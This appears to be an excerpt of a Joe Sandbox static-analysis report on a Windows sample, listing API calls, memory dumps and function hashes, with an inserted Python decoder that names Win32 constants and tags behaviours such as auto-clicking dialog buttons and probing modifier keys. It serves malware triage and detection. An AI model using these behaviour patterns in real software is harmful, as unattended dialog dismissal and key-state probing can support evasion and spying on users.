• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• GetCurrentThreadId.KERNEL32 ref: 00417D80
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 2635119114-3819984048
• Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
• Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
APIs
• Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1600147383-4113822522
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
• GlobalLock.KERNEL32(00000000), ref: 004300F6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• GlobalUnlock.KERNEL32(00000000), ref: 0043010C
• CloseHandle.KERNEL32(00000000), ref: 00430113
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• GlobalFree.KERNEL32(00000000), ref: 00430150
• GetObjectW.GDI32(?,00000018,?), ref: 00430177
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
• DeleteObject.GDI32(?), ref: 004301D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
• String ID: 0
• API String ID: 956284711-4108050209
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 890592661-1007645807
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CharNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1350042424-0
                                                                                                                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(?), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(?), ref: 00443C3A
• EndDialog.USER32(?,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
• String ID: BUTTON
• API String ID: 1834419854-3405671355
• Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
• Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
• Instruction ID: b1ff9d02dd699c4c9237f7ef83bd3b9726f1dd7de931cba3e9e58faaac2e4408
• Opcode Fuzzy Hash: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
• Instruction Fuzzy Hash: FA128D35A012689FCB20CF25CD84AEAB7B4FF06354F0401DAE41AD6A91D7389EC1CF96
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetKeyState.USER32(000000A1), ref: 00453DB5
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
• Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
• Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
• Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
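The two function blocks above are the ones in this stretch of the report worth triaging by hand, and both are easier to read once the raw hex arguments are named. In the block at 00443B67 the sample locates a child window of class BUTTON (FindWindowExW), sends it message 000000F5 (BM_CLICK), then sends 00000010 (WM_CLOSE) and calls EndDialog, with AttachThreadInput and EnumThreadWindows in the helper at 004439C1: a routine that can press a button and dismiss a dialog without any user at the keyboard. In the block at 00453CE0 the arguments to GetAsyncKeyState/GetKeyState are modifier virtual-key codes: 000000A0 VK_LSHIFT, 000000A1 VK_RSHIFT, 00000011 VK_CONTROL, 00000012 VK_MENU (Alt), 0000005B VK_LWIN. The following decoder is an added example written for this page; it is not Joe Sandbox code and not code recovered from the sample. It parses API lines in the exact format the report prints, names the constants from the two blocks (the SAMPLE_LISTING string is a constructed copy of those lines), and turns the call sequence into behaviour tags. The tag names, the regex and the helper names are my own choices, not report fields.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: API lines copied from the two function blocks
# above (dialog dismissal at 00443B67, modifier-key probing at 00453CE0),
# embedded here so the decoder runs offline.
SAMPLE_LISTING = """\
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(?), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(?), ref: 00443C3A
• EndDialog.USER32(?,00000000), ref: 00443C4C
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
"""

# Win32 constants (winuser.h) that the report prints as raw hex.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK", 0x00F7: "BM_SETIMAGE"}
VIRTUAL_KEYS = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
                0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
MODIFIER_KEYS = set(VIRTUAL_KEYS)

# Matches '• Api.MODULE(args), ref: addr', with or without the
# 'Part of subcall function XXXX:' prefix and with or without an argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int


def parse_call(line: str) -> Optional[ApiCall]:
    """Parse one report API line; return None for headers and non-call lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def as_int(arg: str) -> Optional[int]:
    """Hex argument -> int; '?' (unresolved) and symbolic arguments give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_call(call: ApiCall) -> str:
    """Render the call with its numeric constant named where a table is known."""
    note = ""
    if call.api == "SendMessageW" and len(call.args) >= 2:
        msg = as_int(call.args[1])
        if msg is not None:
            note = WINDOW_MESSAGES.get(msg, f"msg=0x{msg:04X}")
    elif call.api in ("GetAsyncKeyState", "GetKeyState") and call.args:
        vk = as_int(call.args[0])
        if vk is not None:
            note = VIRTUAL_KEYS.get(vk, f"vk=0x{vk:02X}")
    elif call.api == "Sleep" and call.args:
        ms = as_int(call.args[0])
        if ms is not None:
            note = f"{ms} ms"
    text = f"{call.ref:08X} {call.api}({', '.join(call.args)})"
    return text + (f"  ; {note}" if note else "")


def summarize(listing: str) -> List[str]:
    """Map the raw call sequence to behaviour tags an analyst would triage on."""
    calls = [c for c in (parse_call(ln) for ln in listing.splitlines()) if c]
    tags = []
    finds_button = any(c.api == "FindWindowExW" and "BUTTON" in c.args for c in calls)
    msgs = {as_int(c.args[1]) for c in calls
            if c.api == "SendMessageW" and len(c.args) >= 2}
    if finds_button and 0x00F5 in msgs:
        tags.append("auto_click_button")      # FindWindowExW(BUTTON) followed by BM_CLICK
    if 0x0010 in msgs or any(c.api == "EndDialog" for c in calls):
        tags.append("auto_close_window")      # WM_CLOSE or EndDialog
    probed = {as_int(c.args[0]) for c in calls
              if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args}
    if probed & MODIFIER_KEYS:
        tags.append("modifier_key_probe")     # Shift/Ctrl/Alt/Win state checks
    return tags


if __name__ == "__main__":
    for line in SAMPLE_LISTING.splitlines():
        call = parse_call(line)
        if call:
            print(decode_call(call))
    print("tags:", summarize(SAMPLE_LISTING))
```

Feed it the APIs section of any function block copied out of the report; calls whose argument is "?" (unresolved by the static pass) are kept but not decoded, so the tags only fire on constants the report actually resolved.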
APIs
• GetDlgItem.USER32(?,00000001), ref: 004357DB
• GetWindowRect.USER32(00000000,?), ref: 004357ED
• MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
• GetDlgItem.USER32(?,00000002), ref: 0043586A
• GetWindowRect.USER32(00000000,?), ref: 0043587C
• MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
• GetDlgItem.USER32(?,000003E9), ref: 004358DC
• GetWindowRect.USER32(00000000,?), ref: 004358EE
• MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
• GetDlgItem.USER32(?,000003EA), ref: 00435941
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
• Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3218148540-0
                                                                                                                                                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461678
